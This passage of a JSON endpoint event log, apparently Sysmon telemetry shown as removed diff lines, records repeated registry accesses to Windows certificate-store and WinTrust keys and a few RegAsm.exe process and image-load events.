"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868550000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "subtype": "terminate", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865280000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868710000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 